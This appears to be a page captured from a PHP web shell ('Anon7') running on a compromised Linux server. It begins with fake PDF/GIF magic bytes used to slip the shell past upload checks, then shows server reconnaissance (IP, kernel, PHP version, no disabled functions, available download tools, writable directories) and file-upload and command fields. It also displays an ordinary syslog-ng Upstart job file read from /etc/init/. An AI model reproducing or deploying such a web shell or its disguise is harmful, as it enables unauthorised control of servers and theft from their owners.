%PDF-1.7 GIF89;
shell
Server IP : 104.20.45.2  /  Your IP : 172.16.20.3
Web Server : Apache/2.4.25 (Debian)
System : Linux f64a392e70de 5.4.0-216-generic #236-Ubuntu SMP Fri Apr 11 19:53:21 UTC 2025 x86_64
User : application ( 1000)
PHP Version : 5.6.40
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /etc/init/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /etc/init/syslog-ng.conf
# syslog-ng - system logging daemon
#
# syslog-ng is an replacement for the traditional syslog daemon, logging messages from applications

description "system logging daemon"

start on filesystem
stop on runlevel [06]

expect fork
respawn

script
  CONF="/etc/syslog-ng/syslog-ng.conf"
  CTRL="/var/lib/syslog-ng/syslog-ng.ctl"
  OPTS=""

  # Allow override of command/conf and opts by /etc/default/syslog-ng
  if [ -f /etc/default/$UPSTART_JOB ]; then
    . /etc/default/$UPSTART_JOB
  fi

  if ! [ -r "$CONF" ] ; then
    echo "Could not read ${CONF}: exiting"
    exit 1
  fi

  exec /usr/sbin/syslog-ng --process-mode=background \
        -f $CONF -c $CTRL \
        -p /var/run/syslog-ng.pid $OPTS

end script

Anon7 - 2022
SCDN GOK